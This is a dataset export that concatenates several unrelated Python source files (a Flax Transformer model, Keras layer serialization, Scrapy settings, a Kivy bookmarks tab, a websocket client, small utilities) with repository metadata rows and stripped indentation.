def __call__(self, inputs, inputs_positions=None, encoder_mask=None):
"""Applies Transformer model on the inputs.
Args:
inputs: input data
inputs_positions: input subsequence positions for packed examples.
encoder_mask: decoder self-attention mask.
Returns:
output of a transformer encoder.
"""
cfg = self.config
assert inputs.ndim == 2 # (batch, len)
# Input Embedding
if self.shared_embedding is None:
input_embed = nn.Embed(
num_embeddings=cfg.vocab_size,
features=cfg.emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
input_embed = self.shared_embedding
x = inputs.astype('int32')
x = input_embed(x)
x = AddPositionEmbs(
config=cfg, decode=False, name='posembed_input')(
x, inputs_positions=inputs_positions)
x = nn.Dropout(rate=cfg.dropout_rate)(x, deterministic=cfg.deterministic)
x = x.astype(cfg.dtype)
# Input Encoder
for lyr in range(cfg.num_layers):
x = Encoder1DBlock(
config=cfg, name=f'encoderblock_{lyr}')(x, encoder_mask)
encoded = nn.LayerNorm(dtype=cfg.dtype, name='encoder_norm')(x)
return encoded
class Decoder(nn.Module):
"""Transformer Model Decoder for sequence to sequence translation.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
shared_embedding: a shared embedding layer to use.
"""
config: TransformerConfig
shared_embedding: Any = None
@nn.compact
def __call__(self,
encoded,
targets,
targets_positions=None,
decoder_mask=None,
encoder_decoder_mask=None):
"""Applies Transformer model on the inputs.
Args:
encoded: encoded input data from encoder.
targets: target inputs.
targets_positions: input subsequence positions for packed examples.
decoder_mask: decoder self-attention mask.
encoder_decoder_mask: encoder-decoder attention mask.
Returns:
output of a transformer decoder.
"""
cfg = self.config
assert encoded.ndim == 3 # (batch, len, depth)
assert targets.ndim == 2 # (batch, len)
# Target Embedding
if self.shared_embedding is None:
output_embed = nn.Embed(
num_embeddings=cfg.output_vocab_size,
features=cfg.emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
output_embed = self.shared_embedding
y = targets.astype('int32')
if not cfg.decode:
y = shift_right(y)
y = output_embed(y)
y = AddPositionEmbs(
config=cfg, decode=cfg.decode, name='posembed_output')(
y, inputs_positions=targets_positions)
y = nn.Dropout(rate=cfg.dropout_rate)(y, deterministic=cfg.deterministic)
y = y.astype(cfg.dtype)
# Target-Input Decoder
for lyr in range(cfg.num_layers):
y = EncoderDecoder1DBlock(
config=cfg, name=f'encoderdecoderblock_{lyr}')(
y,
encoded,
decoder_mask=decoder_mask,
encoder_decoder_mask=encoder_decoder_mask)
y = nn.LayerNorm(dtype=cfg.dtype, name='encoderdecoder_norm')(y)
# Decoded Logits
if cfg.logits_via_embedding:
# Use the transpose of embedding matrix for logit transform.
logits = output_embed.attend(y.astype(jnp.float32))
# Correctly normalize pre-softmax logits for this shared case.
logits = logits / jnp.sqrt(y.shape[-1])
else:
logits = nn.Dense(
cfg.output_vocab_size,
dtype=cfg.dtype,
kernel_init=cfg.kernel_init,
bias_init=cfg.bias_init,
name='logitdense')(
y)
return logits
class Transformer(nn.Module):
"""Transformer Model for sequence to sequence translation.
Attributes:
config: TransformerConfig dataclass containing hyperparameters.
"""
config: TransformerConfig
def setup(self):
cfg = self.config
if cfg.share_embeddings:
if cfg.output_vocab_size is not None:
assert cfg.output_vocab_size == cfg.vocab_size, (
"can't share embedding with different vocab sizes.")
self.shared_embedding = nn.Embed(
num_embeddings=cfg.vocab_size,
features=cfg.emb_dim,
embedding_init=nn.initializers.normal(stddev=1.0))
else:
self.shared_embedding = None
self.encoder = Encoder(config=cfg, shared_embedding=self.shared_embedding)
self.decoder = Decoder(config=cfg, shared_embedding=self.shared_embedding)
def encode(self, inputs, inputs_positions=None, inputs_segmentation=None):
"""Applies Transformer encoder-branch on the inputs.
Args:
inputs: input data.
inputs_positions: input subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
Returns:
encoded feature array from the transformer encoder.
"""
cfg = self.config
# Make padding attention mask.
encoder_mask = nn.make_attention_mask(
inputs > 0, inputs > 0, dtype=cfg.dtype)
# Add segmentation block-diagonal attention mask if using segmented data.
if inputs_segmentation is not None:
encoder_mask = nn.combine_masks(
encoder_mask,
nn.make_attention_mask(
inputs_segmentation,
inputs_segmentation,
jnp.equal,
dtype=cfg.dtype))
return self.encoder(
inputs, inputs_positions=inputs_positions, encoder_mask=encoder_mask)
def decode(
self,
encoded,
inputs, # only needed for masks
targets,
targets_positions=None,
inputs_segmentation=None,
targets_segmentation=None):
"""Applies Transformer decoder-branch on encoded-input and target.
Args:
encoded: encoded input data from encoder.
inputs: input data (only needed for masking).
targets: target data.
targets_positions: target subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
targets_segmentation: target segmentation info for packed examples.
Returns:
logits array from transformer decoder.
"""
cfg = self.config
# Make padding attention masks.
if cfg.decode:
decoder_mask = None
encoder_decoder_mask = nn.make_attention_mask(
jnp.ones_like(targets) > 0, inputs > 0, dtype=cfg.dtype)
else:
decoder_mask = nn.combine_masks(
nn.make_attention_mask(targets > 0, targets > 0, dtype=cfg.dtype),
nn.make_causal_mask(targets, dtype=cfg.dtype))
encoder_decoder_mask = nn.make_attention_mask(
targets > 0, inputs > 0, dtype=cfg.dtype)
# Add segmentation block-diagonal attention masks if using segmented data.
if inputs_segmentation is not None:
decoder_mask = nn.combine_masks(
decoder_mask,
nn.make_attention_mask(
targets_segmentation,
targets_segmentation,
jnp.equal,
dtype=cfg.dtype))
encoder_decoder_mask = nn.combine_masks(
encoder_decoder_mask,
nn.make_attention_mask(
targets_segmentation,
inputs_segmentation,
jnp.equal,
dtype=cfg.dtype))
logits = self.decoder(
encoded,
targets,
targets_positions=targets_positions,
decoder_mask=decoder_mask,
encoder_decoder_mask=encoder_decoder_mask)
return logits.astype(self.config.dtype)
def __call__(self,
inputs,
targets,
inputs_positions=None,
targets_positions=None,
inputs_segmentation=None,
targets_segmentation=None):
"""Applies Transformer model on the inputs.
Args:
inputs: input data.
targets: target data.
inputs_positions: input subsequence positions for packed examples.
targets_positions: target subsequence positions for packed examples.
inputs_segmentation: input segmentation info for packed examples.
targets_segmentation: target segmentation info for packed examples.
Returns:
logits array from full transformer.
"""
encoded = self.encode(
inputs,
inputs_positions=inputs_positions,
inputs_segmentation=inputs_segmentation)
return self.decode(
encoded,
inputs, # only used for masks
targets,
targets_positions=targets_positions,
inputs_segmentation=inputs_segmentation,
targets_segmentation=targets_segmentation)
| 31.43038 | 79 | 0.663541 |
795c8724aa06a697b7ffecde0f34d6198d488266 | 1,586 | py | Python | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | import unittest
class TestUM(unittest.TestCase):
def setUp(self):
"""This method executes BEFORE each test"""
pass
def tearDown(self):
"""This method executes AFTER each test"""
pass
"""
def setUpClass(cls):
# This method executes BEFORE ALL tests
print('Testing begins.')
def tearDownClass(cls):
# This method executes AFTER ALL tests
print('Testing complete.')
"""
def test_numbers_3_4(self):
self.assertEqual(3*4, 12)
def test_strings_a_3(self):
self.assertEqual('a'*3, 'aaa')
"""
List of different checks:
testAssertTrue | Invoke error, if argument != True
testFailUnless | (Outdated) Invoke error, if argument != True
testAssertFalse | Invoke error, if argument != False
testFailIf | (Outdated) Invoke error, if argument != False
testEqual | Check if two arguments are equal.
testEqualFail | (Outdated) Invoke error, if arguments are equal
testNotEqual | Check if two arguments aren't equal
testNotEqualFail | (Outdated) Invoke error, if arguments aren't equal
assertNotAlmostEqual | Compare two arguments with rounding. Invoke error if arguments are equal.
testNotAlmostEqual | (Outdated) Same as assertNotAlmostEqual
assertAlmostEqual | Compare two arguments with rounding. Invoke error if arguments aren't equal.
testAlmostEqual | (Outdated) Same as assertAlmostEqual
"""
if __name__ == '__main__':
unittest.main()
# Pretty interesting: http://www.drdobbs.com/testing/unit-testing-with-python/240165163
| 28.836364 | 98 | 0.691047 |
795c88188f258fbe30dd9b3ce08d4e5848afb0cc | 604 | py | Python | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | import sys
import time
def print_stderr(s):
print(s,file=sys.stderr)
class Timer:
def __init__(self,message='Elapsed time:',notifier=print_stderr):
self.notifier = notifier
if '%' in message:
self.message = message
else:
self.message = message + " %f seconds"
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.interval = self.end - self.start
if self.message:
self.notifier(self.message % self.interval)
| 24.16 | 69 | 0.577815 |
795c88cb1dd9a26b5483b450cfa1e5b775227713 | 2,393 | py | Python | YTV/mywidgets/tmscreen_contents/booktab.py | Eghosa-Osayande/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | 1 | 2020-11-22T20:30:28.000Z | 2020-11-22T20:30:28.000Z | YTV/mywidgets/tmscreen_contents/booktab.py | yande-eghosa/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | null | null | null | YTV/mywidgets/tmscreen_contents/booktab.py | yande-eghosa/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | null | null | null | import cfg
from kivymd.uix.bottomnavigation import *
from kivymd.uix.bottomsheet import *
from kivy.clock import Clock
from kivy.properties import *
from threading import Thread
import ytvApi as ytv
from kivy.lang import Builder
Builder.load_string('''
<BookTab>:
name:'s3'
icon:'star'
text:'BookMarks'
MDBoxLayout:
orientation:'vertical'
MDBoxLayout:
adaptive_height:True
MDRectangleFlatButton:
size_hint_y:None
md_bg_color:0,0,0,1
icon:'trash-can'
text:'Clear Bookmarks'
on_release:root.confirm_delete()
MDRectangleFlatButton:
size_hint_y:None
md_bg_color:0,0,0,1
#icon:'trash-can'
text:'History'
on_release:root.open_history()
RecycleView:
id: book_rv
size_hint_y:
key_viewclass: 'viewclass'
key_size: 'height'
RecycleGridLayout:
id: book_rb
default_size: None, dp(200)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
cols:3
spacing:dp(2)
''')
class BookTab(MDBottomNavigationItem):#FloatLayout, MDTabsBase):
datum=ObjectProperty([])
bug=ObjectProperty(False)
def __init__(self,**kw):
super(BookTab,self).__init__(**kw)
global BOOKTAB
BOOKTAB=cfg.BOOKTAB=self
self.clk1=Clock.schedule_interval(self.sync,1)
def open_history(self,*a):
cfg.SM.current='historyscreen'
def confirm_delete(self,*a):
if True:
self.genre_menu = MDListBottomSheet()
self.genre_menu.add_item('Cancel',lambda *zz:self.genre_menu.dismiss(),icon='cancel')
self.genre_menu.add_item('Clear All BookMarks?',lambda *a:self.delete(),icon='delete')
self.genre_menu.open()
def delete(self,*a):
bk=ytv.BookMarks()
from kivymd.toast import toast
try:
b_seasons={}
except:
pass
bk.clear_bk()
self.bug=True
self.sync()
toast(f'Bookmarks Cleared')
def on_enter(self,*a):
self.ids.book_rv.data=self.datum
self.bug=False
def sync(self,*a):
self.clk1.cancel()
def sync(self):
s=ytv.BookMarks()
bk=s.get_bk()
data=[]
for name in bk.keys():
data.append({ 'viewclass':'BookCard','name':name })
if len(data)==0:
data=[{ 'viewclass':'YLabel','text':'No Bookmarks','halign':'center' }]
self.datum=data
if self.bug:
self.on_enter()
Thread(target=sync,args=(self,),daemon=True).start() | 23.693069 | 90 | 0.664856 |
795c892a8f76fe0f4b498c1810c74c7facaae37b | 704 | py | Python | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | from pathlib import Path
def get_file_rows():
return filter(lambda x: bool(x), Path("input.txt").read_text().split("\n"))
def parse_row(row):
row = row.replace(":", "")
row = row.replace("-", " ")
min_, max_, char, password = row.split(" ")
return int(min_), int(max_), char, password
def count_valid_passwords(rows):
valids = []
for r in rows:
min_, max_, char, password = parse_row(r)
number = password.count(char)
valids.append(min_ <= number <= max_)
return sum(valids)
def execute():
rows = get_file_rows()
result = count_valid_passwords(rows)
print(f"Valid passwords: {result}")
if __name__ == "__main__":
execute()
| 22 | 79 | 0.619318 |
795c8b2b19114377dea4734ae4c8a6bdbdaed262 | 4,256 | py | Python | tensorflow/python/keras/layers/serialization.py | junhee-yoo/tensorflow | 90169feba2d0b082e26c58f7264c353778ffe361 | [
"Apache-2.0"
] | 2 | 2019-08-04T20:28:14.000Z | 2019-10-27T23:26:42.000Z | tensorflow/python/keras/layers/serialization.py | omalleyt12/tensorflow | 4af94829b94a15c4dc51571a2ddf5a015a81d98a | [
"Apache-2.0"
] | 1 | 2019-08-19T08:03:52.000Z | 2019-08-19T08:03:52.000Z | tensorflow/python/keras/layers/serialization.py | omalleyt12/tensorflow | 4af94829b94a15c4dc51571a2ddf5a015a81d98a | [
"Apache-2.0"
] | 1 | 2018-09-03T18:32:25.000Z | 2018-09-03T18:32:25.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layer serialization/deserialization functions.
"""
# pylint: disable=wildcard-import
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.keras.engine.base_layer import AddLoss
from tensorflow.python.keras.engine.base_layer import AddMetric
from tensorflow.python.keras.engine.base_layer import TensorFlowOpLayer
from tensorflow.python.keras.engine.input_layer import Input
from tensorflow.python.keras.engine.input_layer import InputLayer
from tensorflow.python.keras.layers.advanced_activations import *
from tensorflow.python.keras.layers.convolutional import *
from tensorflow.python.keras.layers.convolutional_recurrent import *
from tensorflow.python.keras.layers.core import *
from tensorflow.python.keras.layers.cudnn_recurrent import *
from tensorflow.python.keras.layers.embeddings import *
from tensorflow.python.keras.layers.local import *
from tensorflow.python.keras.layers.merge import *
from tensorflow.python.keras.layers.noise import *
from tensorflow.python.keras.layers.normalization import *
from tensorflow.python.keras.layers.pooling import *
from tensorflow.python.keras.layers.recurrent import *
from tensorflow.python.keras.layers.rnn_cell_wrapper_v2 import *
from tensorflow.python.keras.layers.wrappers import *
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.util.tf_export import keras_export
if tf2.enabled():
from tensorflow.python.keras.layers.normalization_v2 import * # pylint: disable=g-import-not-at-top
from tensorflow.python.keras.layers.recurrent_v2 import * # pylint: disable=g-import-not-at-top
# This deserialization table is added for backward compatibility, as in TF 1.13,
# BatchNormalizationV1 and BatchNormalizationV2 are used as class name for v1
# and v2 version of BatchNormalization, respectively. Here we explicitly convert
# them to the canonical name in the config of deserialization.
_DESERIALIZATION_TABLE = {
'BatchNormalizationV1': 'BatchNormalization',
'BatchNormalizationV2': 'BatchNormalization',
}
@keras_export('keras.layers.serialize')
def serialize(layer):
return {'class_name': layer.__class__.__name__, 'config': layer.get_config()}
@keras_export('keras.layers.deserialize')
def deserialize(config, custom_objects=None):
"""Instantiates a layer from a config dictionary.
Arguments:
config: dict of the form {'class_name': str, 'config': dict}
custom_objects: dict mapping class names (or function names)
of custom (non-Keras) objects to class/functions
Returns:
Layer instance (may be Model, Sequential, Network, Layer...)
"""
# Prevent circular dependencies.
from tensorflow.python.keras import models # pylint: disable=g-import-not-at-top
from tensorflow.python.feature_column import dense_features # pylint: disable=g-import-not-at-top
globs = globals() # All layers.
globs['Network'] = models.Network
globs['Model'] = models.Model
globs['Sequential'] = models.Sequential
# Prevent circular dependencies with FeatureColumn serialization.
globs['DenseFeatures'] = dense_features.DenseFeatures
layer_class_name = config['class_name']
if layer_class_name in _DESERIALIZATION_TABLE:
config['class_name'] = _DESERIALIZATION_TABLE[layer_class_name]
return deserialize_keras_object(
config,
module_objects=globs,
custom_objects=custom_objects,
printable_module_name='layer')
| 42.989899 | 102 | 0.776786 |
795c8b3b12da8483c8c32df738411e472244974e | 451 | py | Python | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 56 | 2018-01-20T17:18:40.000Z | 2022-03-28T22:42:04.000Z | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 2,029 | 2018-01-20T11:37:24.000Z | 2022-03-31T04:10:51.000Z | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 17 | 2018-03-17T09:44:28.000Z | 2021-12-27T19:57:35.000Z | from __future__ import annotations
from dataclasses import dataclass
from sqlalchemy.ext.asyncio import AsyncSession
from starlette.requests import Request
from users.domain.repository import UsersRepository
@dataclass
class Info:
context: Context
@dataclass
class Context:
request: Request
session: AsyncSession
@property
def users_repository(self) -> UsersRepository:
return UsersRepository(session=self.session)
| 18.791667 | 52 | 0.784922 |
795c8be201f0666154bcf46ac9e744264a481d3a | 850 | py | Python | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import websocket
import thread
import time
def on_message(ws, message):
print message
def on_error(ws, error):
print error
def on_close(ws):
print "### closed ###"
def on_open(ws):
ws.send("5e91e4a43b451c5af5efee3e13599cf5")
# def run(*args):
# for i in range(30000):
# time.sleep(1)
# ws.send("Hello %d" % i)
# time.sleep(1)
# ws.close()
# print "thread terminating..."
# thread.start_new_thread(run, ())
if __name__ == "__main__":
websocket.enableTrace(True)
ws = websocket.WebSocketApp("wss://cn.iot.seeed.cc/v1/node/event",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
| 23.611111 | 70 | 0.552941 |
795c8d7c0b8949ee32cdf3f3575f573012be6083 | 1,050 | py | Python | scrapy/conf.py | ajah/scrapy | 9685c24059a1eb95216dcab8f76805c8c0025a60 | [
"BSD-3-Clause"
] | 5 | 2019-04-02T05:00:03.000Z | 2021-04-21T11:03:50.000Z | scrapy/conf.py | xiongww/scrapy | f012cecbd8d32317529c6859e691083ba07ca117 | [
"BSD-3-Clause"
] | null | null | null | scrapy/conf.py | xiongww/scrapy | f012cecbd8d32317529c6859e691083ba07ca117 | [
"BSD-3-Clause"
] | null | null | null | """
Scrapy settings manager
See documentation in docs/topics/settings.rst
"""
import os
import cPickle as pickle
from scrapy.settings import CrawlerSettings
from scrapy.utils.conf import init_env
ENVVAR = 'SCRAPY_SETTINGS_MODULE'
def get_project_settings():
if ENVVAR not in os.environ:
project = os.environ.get('SCRAPY_PROJECT', 'default')
init_env(project)
settings_module_path = os.environ.get(ENVVAR, 'scrapy_settings')
try:
settings_module = __import__(settings_module_path, {}, {}, [''])
except ImportError:
settings_module = None
settings = CrawlerSettings(settings_module)
# XXX: remove this hack
pickled_settings = os.environ.get("SCRAPY_PICKLED_SETTINGS_TO_OVERRIDE")
settings.overrides = pickle.loads(pickled_settings) if pickled_settings else {}
# XXX: deprecate and remove this functionality
for k, v in os.environ.items():
if k.startswith('SCRAPY_'):
settings.overrides[k[7:]] = v
return settings
settings = get_project_settings()
| 27.631579 | 83 | 0.715238 |
795c8e7330a6bc9c079fc95e44753e0091aa94c1 | 1,111 | py | Python | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | null | null | null | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | 1 | 2021-08-18T18:05:37.000Z | 2021-08-18T18:05:37.000Z | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | null | null | null | import gpustat
from kolejka.common.limits import KolejkaStats
def normalize_name(name: str) -> str:
return '-'.join(name.lower().split(' ')[1:])
def gpu_stats(gpus: list = None):
query = gpustat.GPUStatCollection.new_query()
stats = KolejkaStats()
stats.load({
'gpus': {
f'{index}': {
'name': gpu.name,
'id': normalize_name(gpu.name),
'total_memory': gpu.memory_total * 1024 * 1024,
'memory_usage': gpu.memory_total * 1024 * 1024 - gpu.memory_free * 1024 * 1024,
'max_temperature': gpu.temperature,
'max_utilization': gpu.utilization
} for index, gpu in enumerate(query.gpus)
if gpus is None or str(index) in gpus
}
})
return stats
def full_gpuset():
query = gpustat.GPUStatCollection.new_query()
return list(range(len(query.gpus)))
def limited_gpuset(full, gpus, gpus_offset):
if gpus_offset is None:
gpus_offset = 0
return [
str((gpus_offset + _index) % len(full)) for _index in range(gpus)
]
| 28.487179 | 95 | 0.591359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.